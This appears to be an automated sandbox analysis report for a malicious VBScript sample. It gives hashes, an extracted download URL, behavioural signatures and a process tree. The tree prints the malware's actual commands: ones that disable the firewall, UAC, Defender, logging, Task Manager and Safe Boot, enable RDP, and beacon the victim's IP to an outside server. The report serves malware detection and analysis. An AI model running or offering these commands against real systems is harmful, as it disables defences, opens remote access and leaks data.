Analysis
max time kernel: 109s
max time network: 97s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 17:07
Static task: static1
Behavioral task: behavioral1
  Sample: malware.vbs
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: malware.vbs
  Resource: win10v2004-20240426-en
General
Target: malware.vbs
Size: 7KB
MD5: 775f152b958147204f3cc3a4da63c6c8
SHA1: 4814e610f5322f3a9a197c8fd2be170946732367
SHA256: 638565ad01412f15dd5782af2fe1e685d91577ddd995e5eabf46916ed7a25cb9
SHA512: 1bcaa377cabf089f072c8adca62a137ad5ca14ab71ddf3dda7c852ad4a841d5f1678128a0e3c2312d685af8edc5e5ea6189cba0282d93edee9fa1cdf519adc3c
SSDEEP: 96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26195F:qD8qrZgX7xrCdPidfbj2619z
Malware Config
Extracted
http://bonzi.link/Bon.zip
Signatures
UAC bypass 2 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
  pid | process
  6020 | bcdedit.exe
  6036 | bcdedit.exe
  4232 | bcdedit.exe
  6080 | bcdedit.exe
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid | process
  75 | 6072 | powershell.exe
Creates new service(s) 2 TTPs
Disables RegEdit via registry modification 1 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe
Disables Task Manager via registry modification
Modifies Windows Firewall 2 TTPs 10 IoCs
Processes:
  pid | process
  2056 | netsh.exe
  5856 | netsh.exe
  5296 | netsh.exe
  5260 | netsh.exe
  5976 | netsh.exe
  1176 | netsh.exe
  408 | netsh.exe
  2168 | netsh.exe
  2620 | netsh.exe
  5708 | netsh.exe
Possible privilege escalation attempt 8 IoCs
Processes:
  pid | process
  5636 | takeown.exe
  5976 | icacls.exe
  5928 | takeown.exe
  5944 | icacls.exe
  6076 | takeown.exe
  6072 | icacls.exe
  5588 | takeown.exe
  6080 | icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
Processes:
  pid | process
  6072 | icacls.exe
  5588 | takeown.exe
  6080 | icacls.exe
  5636 | takeown.exe
  5976 | icacls.exe
  5928 | takeown.exe
  5944 | icacls.exe
  6076 | takeown.exe
Drops file in System32 directory 19 IoCs
Processes:
  description | ioc | process
  All 19 entries are "File opened for modification" by OpenWith.exe, under C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\:
  iconcache_32.db
  iconcache_16.db
  iconcache_96.db
  iconcache_1920.db
  iconcache_sr.db
  iconcache_wide.db
  iconcache_256.db
  iconcache_768.db
  iconcache_wide_alternate.db
  iconcache_idx.db
  iconcache_32.db
  iconcache_idx.db
  iconcache_2560.db
  iconcache_exif.db
  iconcache_idx.db
  iconcache_32.db
  iconcache_48.db
  iconcache_1280.db
  iconcache_custom_stream.db
Drops file in Windows directory 1 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\rescache\_merged\431186354\3365242012.pri | netsh.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  6056 | sc.exe
  5580 | sc.exe
Processes:
  pid | process
  6072 | powershell.exe
  6024 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe 1 IoCs
Processes:
  pid | process
  5588 | timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
  pid | process
  6112 | ipconfig.exe
  380 | ipconfig.exe
Kills process with taskkill 3 IoCs
Processes:
  pid | process
  5312 | taskkill.exe
  4424 | taskkill.exe
  3596 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8 | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account" | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules" | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | reg.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8 | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | OpenWith.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008b9105210faada01 | OpenWith.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System | reg.exe
  Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | OpenWith.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8 | netsh.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8 | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8\@{Microsoft.Windows.ShellExperienceHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms = "Windows Shell Experience" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-53500 = "Recommended Troubleshooting" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" | OpenWith.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)" | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\International | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup" | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8 | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wifidisplay.dll,-100 = "Wireless Display" | netsh.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8 | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | reg.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1" | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System | reg.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d7e5369da0bc36\a01460c8\@{Microsoft.Windows.Search_1.14.2.19041_neutral_neutral_cw5n1h2txyewy?ms-resource:/ = "Windows Search" | netsh.exe
  Key created | \REGISTRY\USER\.DEF​AULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8 | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8 | netsh.exe
  Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | OpenWith.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\icsvc.dll,-700 = "Virtual Machine Monitoring" | netsh.exe
  Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | cmd.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached | reg.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | cmd.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies | reg.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | cmd.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri | netsh.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8 | netsh.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000 | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop | reg.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer | reg.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts" | netsh.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)" | netsh.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
  pid | process
  2208 | msedge.exe
  2208 | msedge.exe
  2236 | msedge.exe
  2236 | msedge.exe
  5484 | identity_helper.exe
  5484 | identity_helper.exe
  6072 | powershell.exe
  6072 | powershell.exe
  6072 | powershell.exe
  6024 | powershell.exe
  6024 | powershell.exe
  6024 | powershell.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
  pid | process
  2236 | msedge.exe (9 identical entries)
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
  description | pid | process
  Token: SeShutdownPrivilege | 4260 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4260 | powercfg.exe
  Token: SeShutdownPrivilege | 4556 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4556 | powercfg.exe
  Token: SeShutdownPrivilege | 208 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 208 | powercfg.exe
  Token: SeShutdownPrivilege | 4080 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4080 | powercfg.exe
  Token: SeDebugPrivilege | 2668 | whoami.exe
  Token: SeTakeOwnershipPrivilege | 5928 | takeown.exe
  Token: SeShutdownPrivilege | 4396 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 4396 | powercfg.exe
  Token: SeShutdownPrivilege | 5304 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 5304 | powercfg.exe
  Token: SeShutdownPrivilege | 5328 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 5328 | powercfg.exe
  Token: SeShutdownPrivilege | 552 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 552 | powercfg.exe
  Token: SeDebugPrivilege | 5856 | whoami.exe
  Token: SeTakeOwnershipPrivilege | 6076 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 5588 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 5636 | takeown.exe
  Token: SeDebugPrivilege | 6072 | powershell.exe
  Token: SeDebugPrivilege | 6024 | powershell.exe
  Token: SeDebugPrivilege | 5312 | taskkill.exe
  Token: SeDebugPrivilege | 4424 | taskkill.exe
  Token: SeDebugPrivilege | 3596 | taskkill.exe
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
  pid | process
  2236 | msedge.exe (25 identical entries)
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
  pid | process
  2236 | msedge.exe (24 identical entries)
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
  pid | process
  5264 | OpenWith.exe
  5576 | OpenWith.exe
  5848 | OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process (each entry is recorded twice in the report)
  PID 2140 wrote to memory of 2604 | 2140 | cmd.exe | net.exe
  PID 2604 wrote to memory of 960 | 2604 | net.exe | net1.exe
  PID 2140 wrote to memory of 4260 | 2140 | cmd.exe | powercfg.exe
  PID 2140 wrote to memory of 4556 | 2140 | cmd.exe | powercfg.exe
  PID 2140 wrote to memory of 208 | 2140 | cmd.exe | powercfg.exe
  PID 2140 wrote to memory of 4080 | 2140 | cmd.exe | powercfg.exe
  PID 2140 wrote to memory of 2056 | 2140 | cmd.exe | netsh.exe
  PID 2140 wrote to memory of 1176 | 2140 | cmd.exe | netsh.exe
  PID 2140 wrote to memory of 408 | 2140 | cmd.exe | netsh.exe
  PID 2140 wrote to memory of 2168 | 2140 | cmd.exe | netsh.exe
  PID 2140 wrote to memory of 2620 | 2140 | cmd.exe | netsh.exe
  PID 2140 wrote to memory of 5056 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4328 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 1284 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2692 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 3500 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 3968 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2712 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2956 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 3996 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4276 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2328 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4804 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4896 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 5108 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2100 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 1528 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4860 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4288 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2176 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 4340 | 2140 | cmd.exe | reg.exe
  PID 2140 wrote to memory of 2652 | 2140 | cmd.exe | reg.exe
Processes
(The number in brackets is the depth in the process tree; "cmdline:" is the recorded command line; the bullets under a process are the signatures it triggered.)
[1] C:\Windows\System32\WScript.exe
    cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
[1] C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net session
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 session
  [2] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\powercfg.exe
      cmdline: powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\netsh.exe
      cmdline: netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
      - Modifies Windows Firewall
  [2] C:\Windows\system32\netsh.exe
      cmdline: netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
      - Modifies Windows Firewall
  [2] C:\Windows\system32\netsh.exe
      cmdline: netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
      - Modifies Windows Firewall
  [2] C:\Windows\system32\netsh.exe
      cmdline: netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
      - Modifies Windows Firewall
  [2] C:\Windows\system32\netsh.exe
      cmdline: netsh advfirewall set allprofiles state off
      - Modifies Windows Firewall
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
  [2] C:\Windows\system32\reg.exe
      cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
      - Disables RegEdit via registry modification
  [2] C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    [3] C:\Windows\system32\ipconfig.exe
        cmdline: ipconfig
        - Gathers network information
    [3] C:\Windows\system32\findstr.exe
        cmdline: findstr IPv4
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.1.23
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
